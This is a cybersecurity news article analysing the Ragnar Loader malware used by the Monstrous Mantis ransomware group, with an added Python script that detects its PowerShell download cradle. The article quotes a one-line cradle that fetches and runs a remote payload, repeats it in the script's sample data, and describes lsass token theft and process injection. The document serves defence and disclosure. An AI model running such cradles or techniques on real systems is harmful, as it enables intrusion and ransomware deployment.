A sophisticated malware toolkit known as Ragnar Loader has been identified as a critical component in targeted ransomware attacks. The loader, also known as Sardonic Backdoor, serves as the primary infiltration mechanism for the Monstrous Mantis ransomware group, formerly known as Ragnar Locker, which has been attacking organizations since its emergence in 2020.

Catalyst researchers' analysis reveals that Ragnar Loader uses PowerShell-based payloads for execution and relies on strong encryption and encoding methods, including RC4 and Base64, to conceal its operations. Security researchers have determined that the loader's primary function is to establish and maintain persistent access to compromised systems.

The loader is typically distributed as part of a comprehensive toolkit that includes multiple components: a node initialization script, pivoting files, remote desktop protocol files, and remote code execution scripts. The toolkit employs multi-layered obfuscation, dynamic decryption routines, and sophisticated persistence mechanisms that pose significant challenges to conventional security defenses.

Once established, the backdoor can receive multiple commands from its command and control server, including functions to load DLL plugins, read and write files, execute shellcode, and create interactive sessions.

A typical infection begins with a PowerShell command such as the following, which downloads and executes the initial payload:

powershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient).DownloadString(' [.]nip[.]io/4c8b09')

After initial execution, Ragnar Loader decrypts its embedded byte arrays by first decompressing them and then applying RC4 decryption.
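As an added example (not code from the article or from Catalyst's research), the following Python script scores PowerShell process-creation command lines against the download-cradle pattern quoted above, so that the indicator can be turned into a detection rule. The sample events, the indicator weights, the threshold, and the nip.io host (built from the 203.0.113.0/24 documentation range) are all constructed for this example.

```python
import re

# Constructed sample process-creation events (hypothetical; not from the article).
# Each tuple is (process image, command line). The second command line mirrors
# the download cradle quoted in the article, with a placeholder nip.io host built
# from the TEST-NET-3 documentation address 203.0.113.10.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -NoProfile -Command Get-Service"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -ep bypass -c iex (New-Object System.Net.WebClient)"
     ".DownloadString('http://203.0.113.10.nip.io/4c8b09')"),
    (r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
]

# Indicator table: (name, regex, weight). Weights are chosen for this example so
# that the full cradle clearly exceeds the threshold while a lone -ep bypass
# (common in legitimate admin scripts) does not fire on its own.
INDICATORS = [
    ("no_profile",         re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("exec_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I), 1),
    ("invoke_expression",  re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("download_cradle",    re.compile(r"downloadstring|net\.webclient", re.I), 3),
    # nip.io resolves hostnames that embed an IP address; flag that pattern.
    ("ip_embedding_dns",   re.compile(r"\b\d{1,3}(?:[.-]\d{1,3}){3}\.nip\.io\b", re.I), 2),
]

DEFAULT_THRESHOLD = 5  # constructed threshold for this example


def score_command_line(cmd):
    """Return (score, [indicator names]) for one command line."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def is_powershell(image):
    """True when the process image is a PowerShell host binary."""
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def analyze(events, threshold=DEFAULT_THRESHOLD):
    """Return findings for PowerShell launches whose command line scores >= threshold.

    Each finding is a dict with the event index, its score and the matched indicators.
    """
    findings = []
    for idx, (image, cmd) in enumerate(events):
        if not is_powershell(image):
            continue
        score, hits = score_command_line(cmd)
        if score >= threshold:
            findings.append({"index": idx, "score": score, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f['index']}: score={f['score']} indicators={f['indicators']}")
```

On the constructed events only the cradle (event 1) is reported; the admin-style `-ExecutionPolicy Bypass -File` launch scores below the threshold. In production the same scoring would run over Sysmon Event ID 1 or Windows Security 4688 command-line fields, and the nip.io indicator should be extended with whatever dynamic-DNS providers are relevant to the environment.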
Once deployed, the malware enables threat actors to maintain long-term footholds within targeted environments, facilitating extended malicious operations. To establish stealthy control, the loader uses process injection: it steals tokens from lsass.exe to elevate privileges and then injects its payload into legitimate Windows processes, particularly WmiPrvSE.exe. Running inside a legitimate process gives the malware extended system access while hiding it from casual inspection, and this fileless persistence technique helps it remain undetected on compromised systems.

Written by Tushar, cyber security content editor.
This Cyber News was published on cybersecuritynews.com. Publication date: Tue, 11 Mar 2025 06:50:16 +0000